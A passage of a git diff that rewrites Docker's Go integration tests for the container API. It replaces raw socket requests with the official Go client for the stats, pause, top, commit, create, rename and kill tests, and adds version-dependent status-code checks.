+		cli, err := client.NewEnvClient()
+		c.Assert(err, checker.IsNil)
+		defer cli.Close()
+
+		stats, err := cli.ContainerStats(context.Background(), name, true)
+		c.Assert(err, checker.IsNil)
+		bc <- b{stats, err}
 	}()
 
 	// allow some time to stream the stats from the container
@@ -201,10 +219,8 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) {
 	case <-time.After(2 * time.Second):
 		c.Fatal("stream was not closed after container was removed")
 	case sr := <-bc:
-		c.Assert(sr.err, checker.IsNil)
-		c.Assert(sr.status, checker.Equals, http.StatusOK)
-
-		dec := json.NewDecoder(bytes.NewBuffer(sr.body))
+		dec := json.NewDecoder(sr.stats.Body)
+		defer sr.stats.Body.Close()
 		var s *types.Stats
 		// decode only one object from the stream
 		c.Assert(dec.Decode(&s), checker.IsNil)
@@ -212,19 +228,23 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) {
 }
 
 func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) {
-	out, _ := runSleepingContainer(c)
+	out := runSleepingContainer(c)
 	id := strings.TrimSpace(out)
 
-	buf := &integration.ChannelBuffer{make(chan []byte, 1)}
+	buf := &ChannelBuffer{C: make(chan []byte, 1)}
 	defer buf.Close()
 
-	_, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json")
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	defer body.Close()
+	defer cli.Close()
+
+	stats, err := cli.ContainerStats(context.Background(), id, true)
+	c.Assert(err, checker.IsNil)
+	defer stats.Body.Close()
 
 	chErr := make(chan error, 1)
 	go func() {
-		_, err = io.Copy(buf, body)
+		_, err = io.Copy(buf, stats.Body)
 		chErr <- err
 	}()
 
@@ -243,6 +263,34 @@ func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) {
 	c.Assert(<-chErr, checker.IsNil)
 }
 
+// ChannelBuffer holds a chan of byte array that can be populate in a goroutine.
+type ChannelBuffer struct {
+	C chan []byte
+}
+
+// Write implements Writer.
+func (c *ChannelBuffer) Write(b []byte) (int, error) {
+	c.C <- b
+	return len(b), nil
+}
+
+// Close closes the go channel.
+func (c *ChannelBuffer) Close() error {
+	close(c.C)
+	return nil
+}
+
+// ReadTimeout reads the content of the channel in the specified byte array with
+// the specified duration as timeout.
+func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) {
+	select {
+	case b := <-c.C:
+		return copy(p[0:], b), nil
+	case <-time.After(n):
+		return -1, fmt.Errorf("timeout reading from channel")
+	}
+}
+
 // regression test for gh13421
 // previous test was just checking one stat entry so it didn't fail (stats with
 // stream false always return one stat)
@@ -251,14 +299,19 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) {
 	runSleepingContainer(c, "--name", name)
 
 	type b struct {
-		status int
-		body   []byte
-		err    error
+		stats types.ContainerStats
+		err   error
 	}
+
 	bc := make(chan b, 1)
 	go func() {
-		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
-		bc <- b{status, body, err}
+		cli, err := client.NewEnvClient()
+		c.Assert(err, checker.IsNil)
+		defer cli.Close()
+
+		stats, err := cli.ContainerStats(context.Background(), name, true)
+		c.Assert(err, checker.IsNil)
+		bc <- b{stats, err}
 	}()
 
 	// allow some time to stream the stats from the container
@@ -271,10 +324,10 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) {
 	case <-time.After(2 * time.Second):
 		c.Fatal("stream was not closed after container was removed")
 	case sr := <-bc:
-		c.Assert(sr.err, checker.IsNil)
-		c.Assert(sr.status, checker.Equals, http.StatusOK)
-
-		s := string(sr.body)
+		b, err := ioutil.ReadAll(sr.stats.Body)
+		defer sr.stats.Body.Close()
+		c.Assert(err, checker.IsNil)
+		s := string(b)
 		// count occurrences of "read" of types.Stats
 		if l := strings.Count(s, "read"); l < 2 {
 			c.Fatalf("Expected more than one stat streamed, got %d", l)
@@ -287,14 +340,20 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) {
 	runSleepingContainer(c, "--name", name)
 
 	type b struct {
-		status int
-		body   []byte
-		err    error
+		stats types.ContainerStats
+		err   error
 	}
+
 	bc := make(chan b, 1)
+
 	go func() {
-		status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil)
-		bc <- b{status, body, err}
+		cli, err := client.NewEnvClient()
+		c.Assert(err, checker.IsNil)
+		defer cli.Close()
+
+		stats, err := cli.ContainerStats(context.Background(), name, false)
+		c.Assert(err, checker.IsNil)
+		bc <- b{stats, err}
 	}()
 
 	// allow some time to stream the stats from the container
@@ -307,10 +366,10 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) {
 	case <-time.After(2 * time.Second):
 		c.Fatal("stream was not closed after container was removed")
 	case sr := <-bc:
-		c.Assert(sr.err, checker.IsNil)
-		c.Assert(sr.status, checker.Equals, http.StatusOK)
-
-		s := string(sr.body)
+		b, err := ioutil.ReadAll(sr.stats.Body)
+		defer sr.stats.Body.Close()
+		c.Assert(err, checker.IsNil)
+		s := string(b)
 		// count occurrences of `"read"` of types.Stats
 		c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`)))
 	}
@@ -320,24 +379,23 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) {
 	name := "statscontainer"
 	dockerCmd(c, "create", "--name", name, "busybox", "ps")
 
-	type stats struct {
-		status int
-		err    error
-	}
-	chResp := make(chan stats)
+	chResp := make(chan error)
 
 	// We expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine
 	// below we'll check this on a timeout.
 	go func() {
-		resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "")
-		body.Close()
-		chResp <- stats{resp.StatusCode, err}
+		cli, err := client.NewEnvClient()
+		c.Assert(err, checker.IsNil)
+		defer cli.Close()
+
+		resp, err := cli.ContainerStats(context.Background(), name, false)
+		defer resp.Body.Close()
+		chResp <- err
 	}()
 
 	select {
-	case r := <-chResp:
-		c.Assert(r.err, checker.IsNil)
-		c.Assert(r.status, checker.Equals, http.StatusOK)
+	case err := <-chResp:
+		c.Assert(err, checker.IsNil)
 	case <-time.After(10 * time.Second):
 		c.Fatal("timeout waiting for stats response for stopped container")
 	}
@@ -346,28 +404,32 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) {
 func (s *DockerSuite) TestContainerAPIPause(c *check.C) {
 	// Problematic on Windows as Windows does not support pause
 	testRequires(c, DaemonIsLinux)
-	defer unpauseAllContainers()
-	out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30")
+
+	getPaused := func(c *check.C) []string {
+		return strings.Fields(cli.DockerCmd(c, "ps", "-f", "status=paused", "-q", "-a").Combined())
+	}
+
+	out := cli.DockerCmd(c, "run", "-d", "busybox", "sleep", "30").Combined()
 	ContainerID := strings.TrimSpace(out)
 
-	status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerPause(context.Background(), ContainerID)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 
-	pausedContainers, err := getSliceOfPausedContainers()
-	c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused"))
+	pausedContainers := getPaused(c)
 
 	if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] {
 		c.Fatalf("there should be one paused container and not %d", len(pausedContainers))
 	}
 
-	status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil)
+	err = cli.ContainerUnpause(context.Background(), ContainerID)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 
-	pausedContainers, err = getSliceOfPausedContainers()
-	c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused"))
-	c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container."))
+	pausedContainers = getPaused(c)
+	c.Assert(pausedContainers, checker.HasLen, 0, check.Commentf("There should be no paused container."))
 }
 
 func (s *DockerSuite) TestContainerAPITop(c *check.C) {
@@ -376,15 +438,13 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) {
 	id := strings.TrimSpace(string(out))
 	c.Assert(waitRun(id), checker.IsNil)
 
-	type topResp struct {
-		Titles    []string
-		Processes [][]string
-	}
-	var top topResp
-	status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	// sort by comm[andline] to make sure order stays the same in case of PID rollover
+	top, err := cli.ContainerTop(context.Background(), id, []string{"aux", "--sort=comm"})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(json.Unmarshal(b, &top), checker.IsNil)
 	c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles))
 
 	if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" {
@@ -397,19 +457,16 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) {
 
 func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) {
 	testRequires(c, DaemonIsWindows)
-	out, _ := runSleepingContainer(c, "-d")
+	out := runSleepingContainer(c, "-d")
 	id := strings.TrimSpace(string(out))
 	c.Assert(waitRun(id), checker.IsNil)
 
-	type topResp struct {
-		Titles    []string
-		Processes [][]string
-	}
-	var top topResp
-	status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	top, err := cli.ContainerTop(context.Background(), id, nil)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-	c.Assert(json.Unmarshal(b, &top), checker.IsNil)
 	c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles))
 
 	if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" {
@@ -433,16 +490,16 @@ func (s *DockerSuite) TestContainerAPICommit(c *check.C) {
 	cName := "testapicommit"
 	dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test")
 
-	name := "testcontainerapicommit"
-	status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer cli.Close()
 
-	type resp struct {
-		ID string
+	options := types.ContainerCommitOptions{
+		Reference: "testcontainerapicommit:testtag",
 	}
-	var img resp
-	c.Assert(json.Unmarshal(b, &img), checker.IsNil)
+
+	img, err := cli.ContainerCommit(context.Background(), cName, options)
+	c.Assert(err, checker.IsNil)
 
 	cmd := inspectField(c, img.ID, "Config.Cmd")
 	c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd))
@@ -455,20 +512,20 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) {
 	cName := "testapicommitwithconfig"
 	dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test")
 
-	config := map[string]interface{}{
-		"Labels": map[string]string{"key1": "value1", "key2": "value2"},
-	}
-
-	name := "testcontainerapicommitwithconfig"
-	status, b, err := sockRequest("POST", "/commit?repo="+name+"&container="+cName, config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer cli.Close()
 
-	type resp struct {
-		ID string
+	config := containertypes.Config{
+		Labels: map[string]string{"key1": "value1", "key2": "value2"}}
+
+	options := types.ContainerCommitOptions{
+		Reference: "testcontainerapicommitwithconfig",
+		Config:    &config,
 	}
-	var img resp
-	c.Assert(json.Unmarshal(b, &img), checker.IsNil)
+
+	img, err := cli.ContainerCommit(context.Background(), cName, options)
+	c.Assert(err, checker.IsNil)
 
 	label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1")
 	c.Assert(label1, checker.Equals, "value1")
@@ -486,76 +543,79 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) {
 func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) {
 	// TODO Windows to Windows CI - Port this test
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image": "busybox",
-		"Cmd":   []string{"/bin/sh", "-c", "echo test"},
-		"PortBindings": map[string]interface{}{
-			"8080/tcp": []map[string]interface{}{
+
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"/bin/sh", "-c", "echo test"},
+	}
+
+	hostConfig := containertypes.HostConfig{
+		PortBindings: nat.PortMap{
+			"8080/tcp": []nat.PortBinding{
 				{
-					"HostIP":   "",
-					"HostPort": "aa80",
-				},
+					HostIP:   "",
+					HostPort: "aa80"},
 			},
 		},
 	}
 
-	jsonData := bytes.NewBuffer(nil)
-	json.NewEncoder(jsonData).Encode(config)
-
-	status, body, err := sockRequest("POST", "/containers/create", config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
-	c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body))
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err.Error(), checker.Contains, `invalid port specification: "aa80"`)
 }
 
 func (s *DockerSuite) TestContainerAPICreate(c *check.C) {
-	config := map[string]interface{}{
-		"Image": "busybox",
-		"Cmd":   []string{"/bin/sh", "-c", "touch /test && ls /test"},
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"/bin/sh", "-c", "touch /test && ls /test"},
 	}
 
-	status, b, err := sockRequest("POST", "/containers/create", config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer cli.Close()
 
-	type createResp struct {
-		ID string
-	}
-	var container createResp
-	c.Assert(json.Unmarshal(b, &container), checker.IsNil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err, checker.IsNil)
 
 	out, _ := dockerCmd(c, "start", "-a", container.ID)
 	c.Assert(strings.TrimSpace(out), checker.Equals, "/test")
 }
 
 func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) {
-	config := map[string]interface{}{}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &containertypes.Config{}, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
 
-	expected := "Config cannot be empty in order to create a container"
-	c.Assert(getErrorMessage(c, body), checker.Equals, expected)
+	expected := "No command specified"
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) {
 	// Container creation must fail if client specified configurations for more than one network
-	config := map[string]interface{}{
-		"Image": "busybox",
-		"NetworkingConfig": networktypes.NetworkingConfig{
-			EndpointsConfig: map[string]*networktypes.EndpointSettings{
-				"net1": {},
-				"net2": {},
-				"net3": {},
-			},
+	config := containertypes.Config{
+		Image: "busybox",
+	}
+
+	networkingConfig := networktypes.NetworkingConfig{
+		EndpointsConfig: map[string]*networktypes.EndpointSettings{
+			"net1": {},
+			"net2": {},
+			"net3": {},
 		},
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusBadRequest)
-	msg := getErrorMessage(c, body)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networkingConfig, "")
+	msg := err.Error()
 	// network name order in error message is not deterministic
 	c.Assert(msg, checker.Contains, "Container cannot be connected to network endpoints")
 	c.Assert(msg, checker.Contains, "net1")
@@ -564,48 +624,25 @@ func (s *DockerSuite) TestContainerAPICreateMultipleNetworksConfig(c *check.C) {
 }
 
 func (s *DockerSuite) TestContainerAPICreateWithHostName(c *check.C) {
-	hostName := "test-host"
-	config := map[string]interface{}{
-		"Image":    "busybox",
-		"Hostname": hostName,
-	}
-
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
-
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
-
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
-
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
-	c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname"))
-}
-
-func (s *DockerSuite) TestContainerAPICreateWithDomainName(c *check.C) {
 	domainName := "test-domain"
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"Domainname": domainName,
+	hostName := "test-hostname"
+	config := containertypes.Config{
+		Image:      "busybox",
+		Hostname:   hostName,
+		Domainname: domainName,
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer cli.Close()
 
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err, checker.IsNil)
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+	c.Assert(containerJSON.Config.Hostname, checker.Equals, hostName, check.Commentf("Mismatched Hostname"))
 	c.Assert(containerJSON.Config.Domainname, checker.Equals, domainName, check.Commentf("Mismatched Domainname"))
 }
 
@@ -622,51 +659,51 @@ func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) {
 	UtilCreateNetworkMode(c, "container:web1")
 }
 
-func UtilCreateNetworkMode(c *check.C, networkMode string) {
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"HostConfig": map[string]interface{}{"NetworkMode": networkMode},
+func UtilCreateNetworkMode(c *check.C, networkMode containertypes.NetworkMode) {
+	config := containertypes.Config{
+		Image: "busybox",
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
+	hostConfig := containertypes.HostConfig{
+		NetworkMode: networkMode,
+	}
+
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	defer cli.Close()
 
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+	container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err, checker.IsNil)
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
 
-	var containerJSON types.ContainerJSON
-	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
 	c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode"))
 }
 
 func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) {
 	// TODO Windows to Windows CI. The CpuShares part could be ported.
 	testRequires(c, DaemonIsLinux)
-	config := map[string]interface{}{
-		"Image":      "busybox",
-		"CpuShares":  512,
-		"CpusetCpus": "0",
+	config := containertypes.Config{
+		Image: "busybox",
 	}
 
-	status, body, err := sockRequest("POST", "/containers/create", config)
-	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
-
-	var container containertypes.ContainerCreateCreatedBody
-	c.Assert(json.Unmarshal(body, &container), checker.IsNil)
+	hostConfig := containertypes.HostConfig{
+		Resources: containertypes.Resources{
+			CPUShares:  512,
+			CpusetCpus: "0",
+		},
+	}
 
-	status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusOK)
+	defer cli.Close()
 
-	var containerJSON types.ContainerJSON
+	container, err := cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "")
+	c.Assert(err, checker.IsNil)
 
-	c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
+	c.Assert(err, checker.IsNil)
 
 	out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares")
 	c.Assert(out, checker.Equals, "512")
@@ -683,19 +720,29 @@ func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) {
 	create := func(ct string) (*http.Response, io.ReadCloser, error) {
 		jsonData := bytes.NewBuffer(nil)
 		c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil)
-		return sockRequestRaw("POST", "/containers/create", jsonData, ct)
+		return request.Post("/containers/create", request.RawContent(ioutil.NopCloser(jsonData)), request.ContentType(ct))
 	}
 
 	// Try with no content-type
 	res, body, err := create("")
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	// todo: we need to figure out a better way to compare between dockerd versions
+	// comparing between daemon API version is not precise.
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 	body.Close()
 
 	// Try with wrong content-type
 	res, body, err = create("application/xml")
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 	body.Close()
 
 	// now application/json
@@ -719,11 +766,15 @@ func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) {
 				  }
 				}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b[:]), checker.Contains, "invalid port")
 }
@@ -739,11 +790,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C)
 		}
 	}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b[:]), checker.Contains, "invalid restart policy")
 }
@@ -759,11 +814,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) {
 		}
 	}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be used with restart policy")
 }
@@ -779,11 +838,15 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C
 		}
 	}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative")
 }
@@ -799,7 +862,7 @@ func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C)
 		}
 	}`
 
-	res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, _, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 }
@@ -830,11 +893,11 @@ func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) {
 		"NetworkDisabled":false,
 		"OnBuild":null}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 
-	b, err := readBody(body)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	type createResp struct {
 		ID string
@@ -861,12 +924,16 @@ func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) {
 		"Memory":    524287
 	}`
 
-	res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json")
+	res, body, err := request.Post("/containers/create", request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	b, err2 := readBody(body)
+	b, err2 := request.ReadBody(body)
 	c.Assert(err2, checker.IsNil)
 
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	} else {
+		c.Assert(res.StatusCode, checker.Not(checker.Equals), http.StatusOK)
+	}
 	c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB")
 }
 
@@ -875,10 +942,13 @@ func (s *DockerSuite) TestContainerAPIRename(c *check.C) {
 
 	containerID := strings.TrimSpace(out)
 	newName := "TestContainerAPIRenameNew"
-	statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil)
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerRename(context.Background(), containerID, newName)
 	c.Assert(err, checker.IsNil)
-	// 204 No Content is expected, not 200
-	c.Assert(statusCode, checker.Equals, http.StatusNoContent)
 
 	name := inspectField(c, containerID, "Name")
 	c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container"))
@@ -888,9 +958,12 @@ func (s *DockerSuite) TestContainerAPIKill(c *check.C) {
 	name := "test-api-kill"
 	runSleepingContainer(c, "-i", "--name", name)
 
-	status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	err = cli.ContainerKill(context.Background(), name, "SIGKILL")
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 
 	state := inspectField(c, name, "State.Running")
 	c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state))
@@ -899,83 +972,99 @@ func (s *DockerSuite) TestContainerAPIKill(c *check.C) {
 func (s *DockerSuite) TestContainerAPIRestart(c *check.C) {
 	name := "test-api-restart"
 	runSleepingContainer(c, "-di", "--name", name)
